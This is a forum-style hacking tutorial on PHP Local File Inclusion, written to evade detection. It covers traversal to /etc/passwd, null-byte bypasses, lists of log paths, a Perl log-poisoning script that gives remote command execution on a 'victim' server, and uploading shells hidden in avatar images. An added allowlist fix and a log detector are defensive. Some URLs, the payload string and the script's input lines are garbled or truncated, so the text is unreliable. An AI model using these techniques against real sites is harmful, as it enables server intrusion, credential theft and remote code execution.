LFI Tutorial

Hello p0wersurge, this is DubKing with an LFI Tutorial.

Let's check the code that makes it vulnerable:

Code:
<?php
$page = $_GET['page'];
include($page);
?>
Second, let's explain the term "LFI",
which in long form is
"Local File Inclusion": it means you can access other files of the website by using the page parameter in the URL.

Example:
If we have a site like
www.example.com/test/index.php?page=home

you might be able to exploit it if there is another file on the same site,
let's say "example/index.php".

You can access it by going to
"www.example.com/test/index.php?page=../example/index.php"

If said website is hosted on a Unix server, then we might be able to use directory traversal to reach the password file. To test, we could go to: http://www.example.com/test/index.ph.../../etc/passwd

If it worked, the page should look something like:
Code:
username: passwd:UID:GID:full_name:directory:shell
An example of said file would be:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh
Although the password may be shadowed; if it is, it will look something like

Code:
username:x:503:100:FullName:/home/username:/bin/sh
The password in that example would be located in /etc/shadow, which you will most likely not have access to, because it is readable and writable only by root. /etc/passwd, however, is readable by many processes, which is why you are able to read it.

If you see something like
Code:
username:!:503:100:FullName:/home/username:/bin/sh
Then you would know that the password is stored in /etc/security/passwd.

A few files worth looking at would be:

Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Something that web admins try to do to fix that problem is to make the script add ".php" to the end of the URL parameter. So if you were to try going to http://www.example.com/test/index.ph.../../etc/passwd, it would try to bring you to http://www.example.com/test/index.ph...etc/passwd.php, which doesn't exist, since the file we are looking for isn't a PHP file. To get around that, we could use a null byte. To use a null byte, you just have to add "" to the end of the URL before you send it.

The null byte makes it so that anything entered after it is treated as the end of the string, so the appended ".php" is dropped. (This only works against older PHP versions; PHP 5.3.4 and later refuse to include a path that contains a null byte.)
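The proper fix for the vulnerable include, as an added example that is not part of the original post: instead of appending ".php", map the parameter to an allowlist so no user-supplied path ever reaches include(). The pages/ directory and the template names are assumptions.

```php
<?php
// Added example, not from the original post: a hardened replacement for
// "$page = $_GET[page]; include($page);". Assumes the includable templates
// live in ./pages/ (constructed names) and that nothing else may be included.

// Map of permitted ?page= values to the file each one selects. Because the
// lookup is by key, "../example/index.php", "/etc/passwd" and a null-byte
// suffix never reach include(); they simply are not keys in this array.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request must be refused.
function resolve_page(string $requested): ?string
{
    // PHP strings may carry embedded NUL bytes (the %00 trick); refuse them
    // explicitly rather than relying on the PHP version to do so.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // Defence in depth: confirm the resolved file really sits inside ./pages/.
    $base = realpath(__DIR__ . '/pages');
    $real = realpath(__DIR__ . '/pages/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$requested = $_GET['page'] ?? 'home';
$file = is_string($requested) ? resolve_page($requested) : null;
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```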


There are plenty of other ways to use LFI to exploit a web server. In the following, we will inject PHP code into the httpd logs and access them via LFI.

Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
That is a list of log locations. Now that we know where the logs are, we will look inside them and see what they store. In this example, we will use a log that stores "not found" files, and the PHP code. You will then type www.example.com/ into your browser and the PHP code will be logged, because the page doesn't exist. This may not work, because the log may URL-encode it. If you don't have your own script, you can use one I found on the internet.

Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\n";
print $socket "User-Agent: ".$code."\n";
print $socket "Host: ".$site."\n";
print $socket "Connection: close\n\n";
close($socket);
print "\nCode $code successfully injected in $log\n";

print "\nType command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\n";
print $socket "Host: ".$site."\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Save that as something.pl. If the vulnerable code is in example.com/test/test.php, you should change /folder/ to /test/, index.php= to test.php=, and ../../../../../../../etc/httpd/logs/error_log to wherever the log is.

That script will inject the code and then allow you to run a command on the server.
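From the defender's side, this technique leaves distinctive traces in the very logs it abuses. As an added example (not part of the original post), the following PHP check flags the traversal, null-byte, sensitive-file, log-file and planted-PHP-tag patterns described above in Apache combined-format log lines; the sample lines are constructed.

```php
<?php
// Added example, not from the original post: flag access-log entries that show
// the LFI techniques described above. The sample lines below are constructed.
const LFI_PATTERNS = [
    'traversal'  => '~(\.\./|\.\.%2f|%2e%2e%2f|%2e%2e/)~i',
    'null_byte'  => '~%00~',
    'sensitive'  => '~/etc/(passwd|shadow|group|security/)~i',
    'log_target' => '~/(access|error)[._]?log~i',
    'php_tag'    => '~<\?php~i',   // code planted via the URL or User-Agent
];

// Split one Apache "combined" log line into its fields, or null if it does not match.
function parse_log_line(string $line): ?array
{
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['host' => $m[1], 'time' => $m[2], 'request' => $m[3],
            'status' => (int)$m[4], 'referer' => $m[5], 'agent' => $m[6]];
}

// Returns the list of "pattern:field" hits for a line (empty for a clean line).
function flag_line(string $line): array
{
    $entry = parse_log_line($line);
    if ($entry === null) {
        return ['unparsable'];
    }
    $hits = [];
    // Log poisoning puts the payload in the request path (a 404'd URL) or in the
    // User-Agent, so every client-controlled field is inspected, not just the query.
    foreach (['request', 'referer', 'agent'] as $field) {
        foreach (LFI_PATTERNS as $name => $re) {
            if (preg_match($re, $entry[$field])) {
                $hits[] = "$name:$field";
            }
        }
    }
    return $hits;
}

$sample = [  // constructed log lines
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /test/index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /test/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:57:12 +0000] "GET /test/index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 90211 "-" "<?php /* placeholder */ ?>"',
];
foreach ($sample as $line) {
    echo (implode(', ', flag_line($line)) ?: 'clean'), "\n";
}
```

The first line prints "clean"; the second reports traversal, null_byte and sensitive hits in the request, and the third reports traversal and log_target in the request plus php_tag in the User-Agent.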


Lastly, we will look at how you can exploit the avatar uploading feature of a website with LFI.

You will need to add the PHP code you want to execute into the image. To do this, you will need to use a hex editor and add it at the end, or you could use a program called edjpgcom. For that, all you need to do is right-click on an image > Open with > then select the edjpgcom program, then type the code to inject your shell. Once you have your shell in the image, you will need to upload it to the server through the avatar upload feature in the user CP. If it's not a forum you are trying to exploit and there is no way to upload a file, check if it's on a shared hosting server. To do that, do a reverse lookup on the website. The website I use for this is: http://www.yougetsig...-on-web-server/

Now, the tricky part: you need to find the location of the image by causing an error with the image. But if you can't force an error on the image, you can try right-clicking on the image, copying the image location, putting it into the URL, and adding a "?" to the end. (The ? will cause it to run, and the is the null byte.)

If those don't work, you can go back to the /etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see, the username is also a directory. In most cases the name is similar to the domain; if not, you will have to try them until you find the one you're looking for.

Go back to your avatar image, right-click on it, then copy the image location.

In your browser, go back to http://www.example.com/test/index.ph...your/image.jpg

And after that, you should see the shell you added into your image earlier.

Good luck, and have fun. Try not to get caught. 
